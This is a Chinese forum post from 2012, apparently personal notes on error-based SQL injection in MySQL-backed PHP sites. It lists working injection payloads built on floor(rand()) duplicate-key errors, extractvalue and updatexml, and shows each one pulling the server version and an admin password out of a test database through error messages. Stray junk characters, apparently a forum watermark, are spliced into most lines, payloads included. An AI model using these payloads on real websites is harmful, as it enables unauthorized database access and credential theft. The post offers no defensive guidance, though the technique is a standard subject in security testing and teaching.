放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。( R( F! b- X+ }; @$ p
实际测试环境:/ X; o. e. \& d8 c& R% F
9 Y1 v$ v/ V G. ~7 h
8 B1 m9 H% X* R- E* g0 w `( k7 P
mysql> show tables;0 @) Z; m0 R5 C
+----------------+7 X b1 O p. W/ V
| Tables_in_test |% @ z8 J& n9 _3 A3 J9 q
+----------------+
- x' w9 n; m# T, W0 ~: @5 x) T| admin |
/ h) e8 m l! ]- O| article |7 S/ N/ u; {+ q, E+ M$ I
+----------------+
0 [2 c+ Z' x2 @' Y& ^9 ?! J
" G& t' Q, z9 H2 B" K; f ; n8 [6 T% ^% r
; q, [5 g! |! Pmysql> describe admin;1 `3 X* _5 K5 T; a! B+ g
+-------+------------------+------+-----+---------+----------------+
; H6 c% k* u2 ]* ?1 |5 i! u6 c| Field | Type | Null | Key | Default | Extra |
7 q. L) q9 B' G5 h& d6 Q+-------+------------------+------+-----+---------+----------------+
4 Y' n$ |# d, h; y' y6 e) v| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
- P/ @, h; q5 Y# W6 T| user | varchar(50) | NO | | NULL | |
+ x- P$ M2 H6 s1 O| pass | varchar(50) | NO | | NULL | |
- A1 Y# f# @! ?0 v& P8 b+-------+------------------+------+-----+---------+----------------+
4 @, {6 Z" f+ b! v& `8 R7 e6 k
, A/ {$ X: ^3 c7 ?3 x
& ?" B: S7 s) x# y! a* R
, z; h, x8 r5 W( f, cmysql> describe article;
2 J# s& {+ B- g! u, q/ k c0 ?+---------+------------------+------+-----+---------+----------------+8 U w! U+ N+ J) F( w
| Field | Type | Null | Key | Default | Extra |6 i! R# ]9 s: L& N7 {% u0 v5 l
+---------+------------------+------+-----+---------+----------------+
/ M) q% L$ `+ H }. j$ Z& @, w| id | int(10) unsigned | NO | PRI | NULL | auto_increment |+ N5 m- Y+ ?- R* Z) H: V2 f
| title | varchar(50) | NO | | NULL | |
4 G' J7 V! G+ S4 B, v, n| content | varchar(50) | NO | | NULL | |7 T: |0 \3 b) u3 R
+---------+------------------+------+-----+---------+----------------+5 ]" g, e& u0 @: v+ i
1、通过floor报错 S0 l" w. B2 U% g% j
可以通过如下一些利用代码
, e0 w9 q& T" O2 { C8 a % m# a h/ P" |0 s- l" p
1 [' X" U" F% X) {& |
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
% g% s% ], E5 J9 ~) }from information_schema.tables group by x)a);
3 g$ F6 F( j. M R; m8 m' i. H ; b/ _1 q6 }9 Y. k8 e& g
9 R6 m8 r+ r) O2 s$ u
and (select count(*) from (select 1 union select null union select !1)x) d D& X$ k0 l" L
group by concat((select table_name from information_schema.tables limit 1), [+ S! O$ `5 \3 w9 Y5 e! y
floor(rand(0)*2)));
" L9 i- F. N1 n( h: m7 v9 T& [举例如下:) z! j. L" }7 l' g. k. V4 h
首先进行正常查询:0 m' u9 @* Q9 K2 ` ~6 k3 E3 B+ p
& |3 e8 Y' h) z0 @/ k: x9 _
mysql> select * from article where id = 1;
& O1 C }4 q8 o+----+-------+---------+ Y9 R$ D; ]! V7 U4 P- K/ U
| id | title | content |
8 N2 V1 K6 ~' w$ Q" b1 L+----+-------+---------+9 N8 H% r( \+ x6 e* F
| 1 | test | do it |
+ b+ P% \. {' U/ K' K8 z3 j1 k/ I+----+-------+---------+
8 v7 O$ Y/ h& Z G. R( j假如id输入存在注入的话,可以通过如下语句进行报错。8 _! N7 [& M/ M: t. ?+ D8 r
! s3 r. p3 u& C4 x8 z, _1 h; V
) F8 n0 I- H+ D% n& Y! Q3 n) r: M
mysql> select * from article where id = 1 and (select 1 from" `2 L& }7 A! @; X, B* ~
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
' `8 q7 N. k4 C2 Q, e! AERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key') I, J0 B, \0 L4 }2 k* K
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。8 C" ?8 [1 D/ R. _5 t1 [/ V
例如我们需要查询管理员用户名和密码:
/ b+ d+ o3 F3 t2 I- s0 p% Y- z* ^Method1: Q+ j: t( x6 M5 D2 Y3 c
. U0 B+ H8 y) p, }) T" l8 T) b# }- z
0 ^. K e9 g/ ~5 u: tmysql> select * from article where id = 1 and (select 1 from
% E/ S" v+ ]; D0 r9 m3 v(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
1 Z6 M8 _ V3 @% z" a- Jfrom information_schema.tables group by x)a);
/ w7 k( Z% e* @" O, B. E9 [ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'* Y q) }/ K/ b; e9 W2 m, _
Method2:! G) S4 ^. w3 u0 K7 W0 u# n' G% ]
) y4 Q! v# o4 e Z* p
4 x# a3 x1 b1 _7 cmysql> select * from article where id = 1 and (select count(*)( B- G7 ?3 N4 a
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
: Z6 G: o9 l6 g L { }; u* X+ jfloor(rand(0)*2)));
1 [( C, s+ }: v7 i9 mERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
) G3 i' p, k: T g& Y2 U: _8 ?2、ExtractValue2 n* E/ ?7 ]! M+ M9 J2 ~0 G3 ?, E
测试语句如下& m/ j$ G7 W8 X% t3 r$ A
1 P9 Q+ P" ~1 F. ~ 0 r* ^5 D9 i& ~+ h W( u
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));$ T- e/ R$ |" `* e: k) n
实际测试过程
" x# m; Z4 ~7 `5 H* u0 n' ^5 q
d* T7 B( w9 {5 Y; u- }) A! A* {
9 T5 G7 i! S$ U/ Smysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,& q5 y' v& r) Q5 ?2 ]( j
(select pass from admin limit 1)));--
) d" a) F, B- q8 E, EERROR 1105 (HY000): XPATH syntax error: '\admin888'
' ~# t: E0 C. i" [; v3、UpdateXml* t3 `$ U$ C( p( n
测试语句
, \2 N- t, {; I+ n + w7 N6 m( d3 E. f) }
+ u4 T6 j, @2 }" Vand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))* v% y. L/ o8 p
实际测试过程* a% d, H+ Q5 S- o1 v1 ~+ T0 C [
! Y- J1 C! h; e F* y 0 a. i" e# [! F
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
; e4 l- C; Z. H/ Q+ ~(select pass from admin limit 1),0x5e24),1));: m+ O6 W H* x- w9 I& v0 C
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'% I: L* U( G( g" u0 X& U
All, thanks foreign guys.
( g' w. m1 p1 M! w
! B, M8 E$ |4 k2 }6 b; ~ h5 v- `
& Z+ ?1 _- p4 K& T |
发表于 2012-12-10 10:28:51
收藏
支持
反对